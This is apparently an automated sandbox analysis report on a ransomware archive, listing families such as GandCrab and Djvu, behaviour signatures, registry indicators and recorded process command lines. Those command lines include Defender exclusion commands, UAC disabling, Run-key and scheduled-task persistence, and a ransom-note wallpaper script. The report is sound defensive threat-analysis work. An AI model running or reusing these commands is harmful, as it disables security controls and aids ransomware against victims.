Analysis Overview
SHA256
4aeb68c64e5569df9948d6406af74f572366a856682d5642737ebf4f5466bd73
Threat Level: Known bad
The file RNSM00484.7z was found to be: Known bad.
Malicious Activity Summary
Gandcrab
Avoslocker Ransomware
ModiLoader, DBatLoader
GandCrab payload
Djvu Ransomware
Detected Djvu ransomware
UAC bypass
Urelas
ModiLoader Second Stage
Renames multiple (159) files with added filename extension
Deletes shadow copies
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Modifies file permissions
UPX packed file
Checks computer location settings
ASPack v2.12-2.42
Adds Run key to start application
Checks whether UAC is enabled
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Uses Tor communications
Drops file in System32 directory
Sets desktop wallpaper using registry
Drops file in Program Files directory
Program crash
Access Token Manipulation: Create Process with Token
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Suspicious use of SendNotifyMessage
Gathers network information
Suspicious use of AdjustPrivilegeToken
Checks SCSI registry key(s)
Suspicious behavior: GetForegroundWindowSpam
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Scheduled Task/Job: Scheduled Task
Suspicious use of SetWindowsHookEx
System policy modification
Views/modifies file attributes
Modifies registry key
Enumerates system info in registry
Kills process with taskkill
Modifies registry class
Suspicious use of FindShellTrayWindow
Checks processor information in registry
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-09-13 17:51
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-09-13 17:51
Reported
2024-09-13 17:55
Platform
win10v2004-20240802-en
Max time kernel
107s
Max time network
250s
Command Line
Signatures
Avoslocker Ransomware
Detected Djvu ransomware
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Djvu Ransomware
GandCrab payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Gandcrab
ModiLoader, DBatLoader
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Encoder.gen-35a3be045e57f3a0abdbae99984760eef0c3713189deabae330f501178f48e31.exe | N/A |
Urelas
Deletes shadow copies
ModiLoader Second Stage
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Renames multiple (159) files with added filename extension
Command and Scripting Interpreter: PowerShell
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Generic-e7974f558f498367cb1209f37181411662e83f5f522d8e7b48297361bf29506a.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Agent.gen-e50180a261801969db2574932e8deeac87a1efba53e50dbc1fc24a653a6b74bd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.MSIL.Encoder.gen-b3ce84f48b34e821f18bfc828eb8da378d2531f7cc2bb16db82e11bead446b11.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
Executes dropped EXE
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\jnp5dz57we = "C:\\Users\\Admin\\Desktop\\00484\\HEUR-Trojan-Ransom.Win32.Cryptoff.vho-fbf8b45d1697677f1f3e080552bfc66e9db36d03f28b22cf7156f0cb156e71ff.exe" | C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Cryptoff.vho-fbf8b45d1697677f1f3e080552bfc66e9db36d03f28b22cf7156f0cb156e71ff.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchosted = "C:\\Users\\Admin\\AppData\\Roaming\\svchosted" | C:\Windows\system32\reg.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Encoder.gen-35a3be045e57f3a0abdbae99984760eef0c3713189deabae330f501178f48e31.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Encoder.gen-35a3be045e57f3a0abdbae99984760eef0c3713189deabae330f501178f48e31.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
Uses Tor communications
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\services32.exe | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| File opened for modification | C:\Windows\system32\services32.exe | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| File created | C:\Windows\SysWOW64\HelpMe.exe | C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5e6b3680047317ceea85b42cdf508204319b55fe183e42e86847efbd09f5ca80.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\HelpMe.exe | C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5e6b3680047317ceea85b42cdf508204319b55fe183e42e86847efbd09f5ca80.exe | N/A |
| File created | C:\Windows\SysWOW64\notepad.exe.exe | C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5e6b3680047317ceea85b42cdf508204319b55fe183e42e86847efbd09f5ca80.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\696116166.png" | C:\Windows\SysWOW64\reg.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Internet Explorer\iexplore.exe.exe | C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5e6b3680047317ceea85b42cdf508204319b55fe183e42e86847efbd09f5ca80.exe | N/A |
Access Token Manipulation: Create Process with Token
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\sevnz.exe | N/A |
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5e6b3680047317ceea85b42cdf508204319b55fe183e42e86847efbd09f5ca80.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Encoder.gen-35a3be045e57f3a0abdbae99984760eef0c3713189deabae330f501178f48e31.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Generic-e7974f558f498367cb1209f37181411662e83f5f522d8e7b48297361bf29506a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Stop.gen-c9cf26ceba119e99260cc610f71d5a8a25333442523e85f9cc0ff3ce293e117c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Cryptor.gen-5b7bed7349f6b1499b7eac111d7264101b13eeb9684830a4a93bab5f9d79d77e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-ef8045de414c6a1ebbdc6ba03f14e832be975d14e6295d1c0c884768e8f53cdb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\ipconfig.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings | C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Agent.gen-e50180a261801969db2574932e8deeac87a1efba53e50dbc1fc24a653a6b74bd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Encoder.gen-35a3be045e57f3a0abdbae99984760eef0c3713189deabae330f501178f48e31.exe | N/A |
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\RNSM00484.7z
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00484.7z"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /1
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.MSIL.Blocker.gen-9c03d92ab53c3001c366424540352be8192e2b394fb086407fec1c5171092c2a.exe
HEUR-Trojan-Ransom.MSIL.Blocker.gen-9c03d92ab53c3001c366424540352be8192e2b394fb086407fec1c5171092c2a.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.MSIL.Blocker.gen-c11675751bb311049da57745dbae337eafd48db2ca17c4195de23ff9eb40c5b3.exe
HEUR-Trojan-Ransom.MSIL.Blocker.gen-c11675751bb311049da57745dbae337eafd48db2ca17c4195de23ff9eb40c5b3.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.MSIL.Encoder.gen-b3ce84f48b34e821f18bfc828eb8da378d2531f7cc2bb16db82e11bead446b11.exe
HEUR-Trojan-Ransom.MSIL.Encoder.gen-b3ce84f48b34e821f18bfc828eb8da378d2531f7cc2bb16db82e11bead446b11.exe
C:\Windows\SYSTEM32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Agent.gen-e50180a261801969db2574932e8deeac87a1efba53e50dbc1fc24a653a6b74bd.exe
HEUR-Trojan-Ransom.Win32.Agent.gen-e50180a261801969db2574932e8deeac87a1efba53e50dbc1fc24a653a6b74bd.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
dw20.exe -x -s 804
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Cryptoff.vho-fbf8b45d1697677f1f3e080552bfc66e9db36d03f28b22cf7156f0cb156e71ff.exe
HEUR-Trojan-Ransom.Win32.Cryptoff.vho-fbf8b45d1697677f1f3e080552bfc66e9db36d03f28b22cf7156f0cb156e71ff.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Cryptor.gen-5b7bed7349f6b1499b7eac111d7264101b13eeb9684830a4a93bab5f9d79d77e.exe
HEUR-Trojan-Ransom.Win32.Cryptor.gen-5b7bed7349f6b1499b7eac111d7264101b13eeb9684830a4a93bab5f9d79d77e.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\00484\uninstall.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\Run /V "svchosted" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\svchosted
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\696116166.png /f
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.MSIL.Encoder.gen-b3ce84f48b34e821f18bfc828eb8da378d2531f7cc2bb16db82e11bead446b11.exe"
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Encoder.gen-35a3be045e57f3a0abdbae99984760eef0c3713189deabae330f501178f48e31.exe
HEUR-Trojan-Ransom.Win32.Encoder.gen-35a3be045e57f3a0abdbae99984760eef0c3713189deabae330f501178f48e31.exe
C:\Users\Admin\AppData\Local\Temp\svchost32.exe
C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.MSIL.Encoder.gen-b3ce84f48b34e821f18bfc828eb8da378d2531f7cc2bb16db82e11bead446b11.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
